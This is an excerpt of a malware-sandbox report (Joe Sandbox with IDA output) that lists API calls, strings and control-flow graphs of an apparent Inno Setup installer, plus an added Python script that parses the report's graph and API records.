• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: Value$Close
• String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
• API String ID: 3391052094-3342197833
• Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
• Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
• Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
• Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E

Control-flow Graph (function at 00492848): rendered graph and basic-block list omitted; legend: Executed / Not Executed

APIs
• Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
• FindWindowA.USER32(00000000,00000000), ref: 004928B9
Strings
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: FindSleepWindow
• String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
• API String ID: 3078808852-3310373309
• Opcode ID: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
• Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
• Opcode Fuzzy Hash: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
• Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359

Control-flow Graph (function at 00483A7C): rendered graph and basic-block list omitted; legend: Executed / Not Executed

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
• GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
• GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
• GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
Strings
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
• String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
• API String ID: 2230631259-2623177817
• Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
• Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
• Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
• Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E

Control-flow Graph (function at 00468D88): rendered graph and basic-block list omitted; legend: Executed / Not Executed

                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                                      Strings
                                                                                                      • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                                      • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                                      • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                                      • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                                      • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                                      • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                                      • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                                      • %s\%s_is1, xrefs: 00468E05
                                                                                                      • Inno Setup: App Path, xrefs: 00468E4A
                                                                                                      • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                                      • Inno Setup: No Icons, xrefs: 00468E73
                                                                                                      • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                      • API String ID: 47109696-1093091907
                                                                                                      • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                      • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                                      • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                      • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                                                        • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                        • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                                        • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                                      • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                                                                      • CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
                                                                                                        • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                                                                      • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                                      • API String ID: 3771764029-544719455
                                                                                                      • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                                      • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                                                                      • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                                      • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D

Control-flow Graph

Basic blocks (id: address range, calls made in the block), followed by edges (predecessor -> successor):
• 1949: 423874-42387e
• 1950: 4239a7-4239ab
• 1951: 423884-4238a6, call 41f3c4, GetClassInfoA
• 1954: 4238d7-4238e0, GetSystemMetrics
• 1955: 4238a8-4238bf, RegisterClassA
• 1957: 4238e2
• 1958: 4238e5-4238ef, GetSystemMetrics
• 1956: 4238c1-4238d2, call 408cbc, call 40311c
• 1960: 4238f1
• 1961: 4238f4-423950, call 403738, call 4062e8, call 403400, call 42364c, SetWindowLongA
• 1972: 423952-423965, call 424178, SendMessageA
• 1973: 42396a-423998, GetSystemMenu, DeleteMenu * 2
• 1975: 42399a-4239a2, DeleteMenu
• Edges: 1949->1950, 1949->1951, 1951->1954, 1951->1955, 1954->1957, 1954->1958, 1955->1954, 1955->1956, 1956->1954, 1957->1958, 1958->1960, 1958->1961, 1960->1961, 1961->1972, 1961->1973, 1972->1973, 1973->1950, 1973->1975, 1975->1950
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                      • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                                                      • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                                                      • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                                                      • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                                                      • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                                                      • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                                                      • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                                                      • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                                                      • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                                                                      • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                                      • String ID: |6B
                                                                                                      • API String ID: 183575631-3009739247
                                                                                                      • Opcode ID: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                                      • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                                                                      • Opcode Fuzzy Hash: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                                      • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

Control-flow Graph

Basic blocks (id: address range, calls made in the block), followed by edges (predecessor -> successor):
• 1977: 47ce78-47cece, call 42c3fc, call 4035c0, call 47cb3c, call 4525d8
• 1986: 47ced0-47ced5, call 453344
• 1987: 47ceda-47cee9, call 4525d8
• 1991: 47cf03-47cf09
• 1992: 47ceeb-47cef1
• 1995: 47cf20-47cf48, call 42e394 * 2
• 1996: 47cf0b-47cf11
• 1993: 47cf13-47cf1b, call 403494
• 1994: 47cef3-47cef9
• 1997: 47cefb-47cf01
• 2003: 47cf6f-47cf89, GetProcAddress
• 2004: 47cf4a-47cf6a, call 4078f4, call 453344
• 2006: 47cf95-47cfb2, call 403400 * 2
• 2007: 47cf8b-47cf90, call 453344
• Edges: 1977->1986, 1977->1987, 1986->1987, 1987->1991, 1987->1992, 1991->1995, 1991->1996, 1992->1993, 1992->1994, 1993->1995, 1994->1991, 1994->1997, 1995->2003, 1995->2004, 1996->1993, 1996->1995, 1997->1991, 1997->1993, 2003->2006, 2003->2007, 2004->2003, 2007->2006
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(740E0000,SHGetFolderPathA), ref: 0047CF7A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                                      • API String ID: 190572456-256906917
                                                                                                      • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                                      • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                                                                      • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                                      • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D

Control-flow Graph

Basic blocks (id: address range, calls made in the block), followed by edges (predecessor -> successor):
• 2126: 40631c-406336, GetModuleHandleA, GetProcAddress
• 2127: 406338
• 2128: 40633f-40634c, GetProcAddress
• 2129: 406355-406362, GetProcAddress
• 2130: 40634e
• 2131: 406364-406366, SetProcessDEPPolicy
• 2132: 406368-406369
• Edges: 2126->2127, 2126->2128, 2127->2128, 2128->2129, 2128->2130, 2129->2131, 2129->2132, 2130->2129, 2131->2132
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                      • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                      • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                      • API String ID: 3256987805-3653653586
                                                                                                      • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                                      • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                                      • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                                      • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
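The record above is the one worth reading in context: the routine at 0040631C resolves SetDllDirectoryW, SetSearchPathMode and SetProcessDEPPolicy by name (they do not exist on older Windows versions, so an installer cannot import them statically) and then calls SetProcessDEPPolicy with 00000001, which is PROCESS_DEP_ENABLE. The graph and the APIs list are exported by the report as one flattened line and one bullet list per function. The script below is an added example written for this page, not Joe Sandbox's own code: it parses both forms for this routine, maps every call site back to its basic block, and computes which blocks lie on a path from the function entry to the SetProcessDEPPolicy call. The token grammar (an "ID START-END" pair opens a block, bare tokens are its calls, "call X" is an internal call, "X * n" repeats the previous call, "A->B" is an edge) is inferred from the report text and is an assumption, not a documented export format; CFG_TEXT and API_LINES are copied from this record, and the same functions apply to every other function record on the page.

```python
"""Parse this report's per-function records: the flattened control-flow graph
("ID START-END calls..." tokens interleaved with "A->B" edges) and the APIs list
("Name.MODULE(args), ref: ADDR"); map each API call to its basic block and find
the blocks on a path from the entry to a chosen call. Added example for this page,
not Joe Sandbox code; the token grammar is inferred from the report (an assumption)."""
import re
from collections import deque, namedtuple
from dataclasses import dataclass, field

# Copied from the report's record for the routine at 0040631C.
CFG_TEXT = ("2126 40631c-406336 GetModuleHandleA GetProcAddress 2127 406338 2126->2127 "
            "2128 40633f-40634c GetProcAddress 2126->2128 2127->2128 2129 406355-406362 "
            "GetProcAddress 2128->2129 2130 40634e 2128->2130 2131 406364-406366 "
            "SetProcessDEPPolicy 2129->2131 2132 406368-406369 2129->2132 2130->2129 2131->2132")
API_LINES = """\
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
• GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
• GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
• SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
"""

@dataclass
class Block:
    bid: int
    start: int
    end: int
    calls: list = field(default_factory=list)   # "call 4078f4" (internal) or an imported API name
    succs: list = field(default_factory=list)   # ids of successor blocks

# via: address from a "Part of subcall function X: ..." line, else None
ApiCall = namedtuple("ApiCall", "name module args ref via")

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_RANGE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")
_API = re.compile(r"^[•*-]?\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
                  r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")

def parse_cfg(text):
    """Return {block id: Block}; 'ID RANGE' opens a block that collects calls until an edge or the next block."""
    blocks, cur, toks, i = {}, None, text.split(), 0
    while i < len(toks):
        t, edge = toks[i], _EDGE.match(toks[i])
        if edge:
            blocks[int(edge.group(1))].succs.append(int(edge.group(2)))
            cur = None
        elif t.isdigit() and i + 1 < len(toks) and _RANGE.match(toks[i + 1]):
            rng = _RANGE.match(toks[i + 1])
            start = int(rng.group(1), 16)
            cur = blocks[int(t)] = Block(int(t), start, int(rng.group(2), 16) if rng.group(2) else start)
            i += 1
        elif cur is None:
            raise ValueError(f"unexpected token {t!r} outside a block")
        elif t == "call":                        # "call 4078f4": call into an internal routine
            cur.calls.append("call " + toks[i + 1]); i += 1
        elif t == "*":                           # "X * 2": the preceding call repeats
            cur.calls.extend([cur.calls[-1]] * (int(toks[i + 1]) - 1)); i += 1
        else:                                    # bare token: imported API name
            cur.calls.append(t)
        i += 1
    return blocks

def parse_api_lines(text):
    """Parse the APIs list; lines not in 'Name.MODULE(args), ref: ADDR' form are skipped."""
    calls = []
    for line in text.splitlines():
        m = _API.match(line.strip())
        if m:
            via, name, module, args, ref = m.groups()
            calls.append(ApiCall(name, module, args.split(",") if args else [],
                                 int(ref, 16), int(via, 16) if via else None))
    return calls

def block_for_ref(blocks, ref):
    """Map a call-site address back to the block containing it (None if outside the graph)."""
    return next((b for b in blocks.values() if b.start <= ref <= b.end), None)

def blocks_on_path(blocks, src, dst):
    """Ids of blocks on at least one src->dst path: forward reach from src ∩ backward reach from dst."""
    preds = {bid: [b.bid for b in blocks.values() if bid in b.succs] for bid in blocks}
    def reach(start, nbrs):
        seen, todo = {start}, deque([start])
        while todo:
            new = [n for n in nbrs(todo.popleft()) if n not in seen]
            seen.update(new); todo.extend(new)
        return seen
    return reach(src, lambda b: blocks[b].succs) & reach(dst, lambda b: preds[b])

def resolved_imports(calls):
    """Names the routine looks up at run time: the second argument of each GetProcAddress."""
    return [c.args[1] for c in calls if c.name == "GetProcAddress" and len(c.args) > 1]

if __name__ == "__main__":
    blocks, calls = parse_cfg(CFG_TEXT), parse_api_lines(API_LINES)
    entry = min(blocks.values(), key=lambda b: b.start)          # lowest address = function entry
    print("resolved at run time:", resolved_imports(calls))
    for c in calls:
        print(f"{c.ref:08X} {c.name} in block {block_for_ref(blocks, c.ref).bid}")
    dep = block_for_ref(blocks, 0x406366)                        # the SetProcessDEPPolicy(1, ...) call
    print("blocks on a path to it:", sorted(blocks_on_path(blocks, entry.bid, dep.bid)))
```

Run as-is it reports that the three names are resolved dynamically, places the SetProcessDEPPolicy call in block 2131, and shows that every block except the exit block 2132 lies on a path to it, i.e. the DEP call is only skipped when GetProcAddress for SetProcessDEPPolicy fails (the 2129->2132 edge). Feeding the other records on this page through parse_cfg is how to check, for instance, that the RegCloseKey in the Inno Setup uninstall-key reader is reached from every branch that opened the key.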
                                                                                                      APIs
                                                                                                      • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                      • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                      • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                      • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                      • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: LongWindow$Prop
• String ID: 3A$yA
• API String ID: 3887896539-3278460822

APIs
• SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
• ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
  • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
  • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
• ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
• SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
• ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
Similarity
• API ID: Icon$Extract$FileInfo$CursorDestroyDraw
• String ID: c:\directory$shell32.dll$%H
• API String ID: 3376378930-166502273
APIs
• GetActiveWindow.USER32 ref: 0042F58F
• GetFocus.USER32 ref: 0042F597
• RegisterClassA.USER32(004997AC), ref: 0042F5B8
• CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
• CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
• ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
• SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
Similarity
• API ID: Window$CreateFocus$ActiveClassRegisterShow
• String ID: TWindowDisabler-Window
• API String ID: 3167913817-1824977358
APIs
